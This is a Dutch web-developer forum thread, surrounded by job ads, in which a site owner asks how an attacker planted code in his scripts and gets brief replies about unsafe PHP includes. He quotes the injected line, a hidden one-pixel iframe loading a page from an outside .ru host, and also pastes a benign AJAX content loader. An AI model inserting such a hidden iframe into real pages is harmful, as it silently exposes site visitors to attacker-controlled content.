Beveiligings issue

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Ervaren PHP Developer

Functieomschrijving PHP Developer met brede ervaring gezocht! Ben jij een Full Stack PHP Developer met brede ervaring die toe is aan een volgende stap? Lees dan snel verder! Voor onze eindklant in de regio Nunspeet zijn wij op zoek naar een ervaren PHP Developer die het IT Team van deze organisatie gaat versterken. Wij zoeken een enthousiaste en breed georiënteerde IT-er die er voor gaat zorgen dat deze innovatieve organisatie de volgende stap gaat maken. Om deze functie goed uit te kunnen voeren moet je communicatief goed zijn en in staat zijn om zelfstandig problemen op te lossen. Daarnaast bestaat

Bekijk vacature »

.NET developer

Functie Heb jij veel kennis van ASP.NET Webforms en wil jij juist de overstap maken naar ASP.NET Core? Wij zijn per direct op zoek naar een ervaren .NET Webdeveloper die met ons samen ons platform wilt herschrijven van ASP.NET Webforms naar ASP.NET Core. Voor jou de unieke kans om met ons samen te innoveren en kennis op te doen van de nieuwste technieken binnen de Microsoft Stack. Wij hebben een development team met 10 IT specialisten bestaande uit onder andere 4 backend .NET developers en twee front-end developers. Wij zijn continu bezig om ons als team en bedrijf te blijven

Bekijk vacature »

Als Front-end developer werken aan apps voor het o

Functie Als Front-end developer werk je intensief samen met 1 van de UX-designers en denk je mee over de gebruiksvriendelijkheid en design van onze web- en mobile apps. Je bent betrokken bij sessies met gebruikers om designs te valideren en usability van de app-in-wording te testen. Vervolgens gebruik je dit om samen met je team waarin ook back-end (.NET) developers zitten, te zorgen voor de realisatie van de best mogelijke apps voor studenten en docenten. Eisen • Je hebt een hands-on development en coding mind-set en werkt graag aan een high quality code base welke je consequent onderhouden kan worden

Bekijk vacature »

PHP Developer

Dit ga je doen Je werkt nauw samen met het websitebureau aan de ontwikkeling en optimalisering van het internationale platform; Je ziet nieuwe webshops op en voert optimalisaties door; Je bouwt aan technische, functioneel en commercial resultaat; Je vindt het leuk om zelfstandig binnen een internationale organisatie te werken, maar krijgt ook energie om samen met collega's te werken. Hier ga je werken Voor een bedrijf in de regio Rotterdam zijn wij opzoek naar een PHP Developer. Je wordt onderdeel van het communicatieteam en gaat je bezighouden met het optimaliseren van de website van dit internationale bedrijf. Je schakelt veel

Bekijk vacature »

Python (Django) developer - Remote in The Netherla

Functie Together with your team, consisting of a senior, 2 mediors and one junior developer, you will work on their software in an Agile-based approach. You have an eye for quality, risk, and customer interest. Communication with your colleagues and, where necessary, with customers, plays an important role in achieving a successful result. As a person, you are smart, get things done, and are result-oriented. There is a lot of independence within the development team, apart from the stand-up (10:00 am) and occasional pair-programming sessions. Techniques they use include Python, Django, MySQL, Mercurial, Ubuntu Linux, Nginx. In terms of front-end

Bekijk vacature »

C# .NET Developer

Functie omschrijving Ben jij op zoek naar een nieuwe uitdaging binnen development waar je komt te werken binnen een flexibel, jong en ondernemend bedrijf. Lees dan snel verder! Voor deze functie zoeken wij een C# .NET Developer die enthousiast wordt van het aansluiten en begeleiden van (complexe) nieuwe klanten. Daarnaast begeleid je complexe projecten, wij zoeken iemand die altijd kansen ziet en waarbij het glas altijd half vol is. Voor deze functie zoeken wij een Developer met ervaring op het gebied van .NET die deze organisatie gaat versterken. Binnen de organisatie ga jij je vooral bezighouden met het verbeteren van

Bekijk vacature »

Front-end Developer

Gezellige team, passie en een groene toekomst! Lees hier de vacature van Front-end Developer bij All in Power! All in power heeft zich tot doel gesteld écht bij te dragen aan de energietransitie. Dit doen wij door de markt voor energie volledig op zijn kop te zetten. Producenten van schone (wind- of zonne-)energie verkopen via ons platform hun energie rechtstreeks aan gebruikers. Of dit nu huishoudens, bedrijven of bijvoorbeeld laadpalen zijn ons platform maakt het uitwisselen van energie mogelijk. Zo maken we de business case van onze klanten veel sterker en loont het om (meer) te investeren in vergroening voor

Bekijk vacature »

.NET developer

Klaar voor een nieuwe uitdaging? Welke technologieën gaan schuil achter de dagelijkse energievoorziening? Als senior .NET developer bij Kenter maak jij samen met je team het verschil, zowel voor de interne organisatie als voor eindklanten. Samen bouwen jullie aan innovatieve dienstverlening met behulp van de nieuwste technologieën en tools. Het is een functie met veel vrijheid, goede arbeidsvoorwaarden én je draagt jouw steentje bij aan de energietransitie. Klinkt dit als iets voor jou? Lees dan verder of solliciteer direct! Wat ga je doen als senior .NET developer? Als senior .NET developer bij Kenter (onderdeel van Alliander) ben je van onschatbare

Bekijk vacature »

App Developer

Samen werken aan een gezonder Nederland en toekomstbestendige zorg voor iedereen. Dat is de impact die jij kan hebben als App Developer bij VGZ. Wil jij een bijdrage leveren aan een maatschappij waarin iedereen zich thuis voelt? Bekijk dan de vacature. Uit onderzoek van Computable is VGZ verkozen tot ‘beste niet-ICT werkgever voor ICT’ers van Nederland’ Hoe ook jij het verschil maakt Als App developer werk jij aan het belangrijkste communicatiekanaal van VGZ, namelijk de App! Als App developer bij VGZ maak je onderdeel uit van een van onze App-teams. Met een goede mix van kennis en ervaring zet je

Bekijk vacature »

.NET Developer

Functie omschrijving In deze functie ga je werken als C# Developer. Jij gaat aan de slag met de volgende taken: Maatwerk software bouwen; Huidige softwareprojecten verder uitbouwen en optimaliseren; Ideeën van de klant omzetten naar handige oplossingen en tools; Bovenstaande doe je middels de Microsoft- stack: C#, ASP.NET en MVC/ Entity Framework. Ben je net afgestudeerd aan een HBO opleiding Informatica, aarzel dan niet om te solliciteren. Dit is namelijk de ideale startersfunctie! Bedrijfsprofiel Deze organisatie is gevestigd in de regio van Boxtel. Het is van oorsprong een familiebedrijf, die gestart zijn met het bouwen van websites. Dit is door

Bekijk vacature »

PHP Developer

Functieomschrijving Wij zijn op zoek naar een PHP Developer met Laravel ervaring! Voor een groeiende werkgever in regio Breda zijn wij op zoek naar een medior PHP developer met Laravel ervaring. Je gaat aan de slag met het ontwikkelen van maatwerk software voor klanten in een specifieke markt. Als PHP developer ben je samen met een gemotiveerd team van 6 collega’s verantwoordelijk voor de ontwikkeling, beheer en het innoveren van informatiesystemen voor klanten in een specifieke branche. Als software developer ondersteun je complexe uitdagingen van klanten. Je brengt hun wensen in kaart en vertaalt deze door naar maatwerk software. Om

Bekijk vacature »

Ontwikkelaar Centrale Monitoring

Ontwikkelaar centrale Monitoring Functieomschrijving Wil jij een bijdrage leveren aan het onderhoud, opzetten en ontwikkelingen van technologieën van SSC-ICT, een van de grootste ICT-dienstverleners van en voor de Rijksoverheid? Je komt als monitorspecialist te werken bij team Operations Management Services. Dit team werkt aan het stabiliseren en waarborgen van een betrouwbare monitoromgeving voor 7 ministeries. Jij begeleidt het implementatieproces van de te monitoren technologieën, onder andere via management packs, connectoren en API's. Je hebt hiervoor veel contact met interne en externe klanten, die hun wensen op het gebied van monitoring aan jou doorgeven. Je beoordeelt deze wensen en komt met

Bekijk vacature »

Software Programmeur PHP - JAVA

Functie Voor een opdrachtgever in omgeving Zoetermeer zijn wij op zoek naar een ontwikkelaar ter versterking van het huidige developers team. Heb jij altijd al willen werken voor een bedrijf, dat veilige netwerkverbindingen levert, door middel van veilige oplossingen, die door middel van de nieuwste technologieën ontwikkelt zijn? Stop dan nu met zoeken! Hoe kan jouw dag er straks uitzien? Je gaat software en webapplicaties ontwikkelen met behulp van de talen C / C++ / PHP. Je gaat technische klussen uitvoeren op locatie bij klanten. Je onderhoudt contact met de projectleider om er zeker van te zijn dat een projecten

Bekijk vacature »

C# Developer

Functie omschrijving Voor een softwarebedrijf in de omgeving van Veghel zijn we op zoek naar een C# developer. Word jij blij van ontwikkelen in C# en .NET? Lees dan snel verder! Jouw werkzaamheden zullen er als volgt uit gaan zien: Door middel van ASP.NET, MVC Framework en C# ga je webshops, websites en webapplicaties ontwikkelen. Je zorgt voor de optimalisatie van bestaande software en de automatisering van bedrijfsprocessen. Op basis van de wensen van de klant ga je samen met je collega's ga je op zoek naar de juiste oplossingen en je gaat dit uitwerken tot een mooi eindproduct. Bedrijfsprofiel

Bekijk vacature »

Java Developer (Training And Simulation)

Wat jij doet Je zou onze Java Developer zijn en nauw samenwerken met je Product Owner, Software System Engineer, Scrum Master en andere Developers. Samen draag je bij aan een multidisciplinair en zelf organiserend Agile team. De rol is zeer afwisselend en bestaat uit, maar is zeker niet beperkt tot: de-risk en prototype onbewezen simulatietechnologieën; simulatiekaders ontwikkelen voor gebruik door andere teams; je bent goed in het begrijpen van ingewikkelde ideeën; heeft de mogelijkheid om nauw samen te werken met grote internationale klanten, leveranciers en overheden om onze oplossingen, vastleggingsvereisten, enz. te definiëren en te presenteren. Ben jij het? Wij

Bekijk vacature »
Sander b

sander b

02/08/2008 21:18:00
Quote Anchor link
Hallo allemaal,

Sinds een aantal maanden gebruik ik wat simpele OOP scriptjes die ik gevonden heb op dynamic drive. Het volgende verbazende probleem deed zich voor; op mijn site werd een virus geconstateerd door Avast.

Na wat doorzoeken van de scripts blijkt een "cracker" een code in mijn scripts geplaatst te hebben dat een website opent;
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<body><iframe width=1 height=1 border=0 frameborder=0 src="http://wfrules.ru/rotate/index.php"></iframe>


Dit brengt de volgende vragen met zich mee; hoe hebben ze dit kunnen doen? Kan dit door ajax te gebruiken gebeuren? Hoe stel ik mijn website in veiligheid hiertegen?

Weet iemand dit te beantwoorden?

Alvast bedankt:)
 
PHP hulp

PHP hulp

09/11/2024 02:30:03
 
--

--

02/08/2008 21:21:00
Quote Anchor link
Misschien is dat gekomen door onveilig includen..?
 

02/08/2008 21:22:00
Quote Anchor link
Welk scriptje is het?
 
Sander b

sander b

02/08/2008 21:23:00
Quote Anchor link
En wat is onveilig includen precies?
 

02/08/2008 21:26:00
Quote Anchor link
Zie ook dit.
 
Sander b

sander b

02/08/2008 21:28:00
Quote Anchor link
Het is een behoorlijk groot script;

De code waarmee ik het aanroep
onMouseOver="ajax_loadContent('contentarea_z','uitleg.php?u=home');return false"

De code waarin ik het laad

<div id="contentarea_z" class="fl_14_pre">
</div>

De JS van DHTMLgoodies (mijn excuses, niet dynamic drive)

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
var enableCache = true;

var jsCache = new Array();



var dynamicContent_ajaxObjects = new Array();



function ajax_showContent(divId,ajaxIndex,url)

{

    var targetObj = document.getElementById(divId);

    targetObj.innerHTML = dynamicContent_ajaxObjects[ajaxIndex].response;

    if(enableCache){

        jsCache[url] =     dynamicContent_ajaxObjects[ajaxIndex].response;

    }

    dynamicContent_ajaxObjects[ajaxIndex] = false;

    

    ajax_parseJs(targetObj)

}



function ajax_loadContent(divId,url)

{

    if(enableCache && jsCache[url]){

        document.getElementById(divId).innerHTML = jsCache[url];

        ajax_parseJs(document.getElementById(divId))

        evaluateCss(document.getElementById(divId))

        return;

    }

    

    var ajaxIndex = dynamicContent_ajaxObjects.length;

    document.getElementById(divId).innerHTML = 'Loading content - please wait';

    dynamicContent_ajaxObjects[ajaxIndex] = new sack();

    

    if(url.indexOf('?')>=0){

        dynamicContent_ajaxObjects[ajaxIndex].method='GET';

        var string = url.substring(url.indexOf('?'));

        url = url.replace(string,'');

        string = string.replace('?','');

        var items = string.split(/&/g);

        for(var no=0;no<items.length;no++){

            var tokens = items[no].split('=');

            if(tokens.length==2){

                dynamicContent_ajaxObjects[ajaxIndex].setVar(tokens[0],tokens[1]);

            }    

        }    

        url = url.replace(string,'');

    }



    

    dynamicContent_ajaxObjects[ajaxIndex].requestFile = url;    // Specifying which file to get

    dynamicContent_ajaxObjects[ajaxIndex].onCompletion = function(){ ajax_showContent(divId,ajaxIndex,url); };    // Specify function that will be executed after file has been found

    dynamicContent_ajaxObjects[ajaxIndex].runAJAX();        // Execute AJAX function    

    

    

}



function ajax_parseJs(obj)

{

    var scriptTags = obj.getElementsByTagName('SCRIPT');

    var string = '';

    var jsCode = '';

    for(var no=0;no<scriptTags.length;no++){    

        if(scriptTags[no].src){

            var head = document.getElementsByTagName("head")[0];

            var scriptObj = document.createElement("script");

    

            scriptObj.setAttribute("type", "text/javascript");

            scriptObj.setAttribute("src", scriptTags[no].src);      

        }else{

            if(navigator.userAgent.toLowerCase().indexOf('opera')>=0){

                jsCode = jsCode + scriptTags[no].text + '\n';

            }

            else

                jsCode = jsCode + scriptTags[no].innerHTML;    

        }

        

    }



    if(jsCode)ajax_installScript(jsCode);

}





function ajax_installScript(script)

{        

    if (!script)

        return;        

    if (window.execScript){            

        window.execScript(script)

    }else if(window.jQuery && jQuery.browser.safari){ // safari detection in jQuery

        window.setTimeout(script,0);

    }else{            

        window.setTimeout( script, 0 );

    }

}    

    

    

function evaluateCss(obj)

{

    var cssTags = obj.getElementsByTagName('STYLE');

    var head = document.getElementsByTagName('HEAD')[0];

    for(var no=0;no<cssTags.length;no++){

        head.appendChild(cssTags[no]);

    }    

}
 

02/08/2008 21:31:00
Quote Anchor link
Nou, daar ligt het niet aan. Het ligt aan jou php. Oh, en je had wel een link naar dat scriptje mogen doen hoor, dat had je hier helemaal niet hoeven plaatsen.
Gewijzigd op 01/01/1970 01:00:00 door
 
Sander b

sander b

02/08/2008 21:33:00
Quote Anchor link
Oke, dus include (wat ik regelmatig doe) is gevaarlijk? Hoe kan ik veilig includen?

Bedankt voor het helpen trouwens:)
 
Sander b

sander b

02/08/2008 21:34:00
Quote Anchor link
Trouwens, sorry voor dat hele script, maar mijn website is oppeens offline nadat ik de hele public html heb leeg gemaakt als map. Heb ik iets doms gedaan? Of is dit toevallig.

En ik bedoel dus de hele server valt niet te bereiken:p niet dat mijn index niet geladen kan worden want dat lijkt mij inderdaad wel logisch.
Niet Bumpen::
Twee of meer keer achter elkaar in een topic posten heet bumpen. Bumpen is pas na 24 uur toegestaan en kan een reden zijn voor de admins en moderators om een topic te sluiten. Gebruik indien nodig de Afbeelding knop om je tekst aan te passen.

SanThe.
Gewijzigd op 01/01/1970 01:00:00 door sander b
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.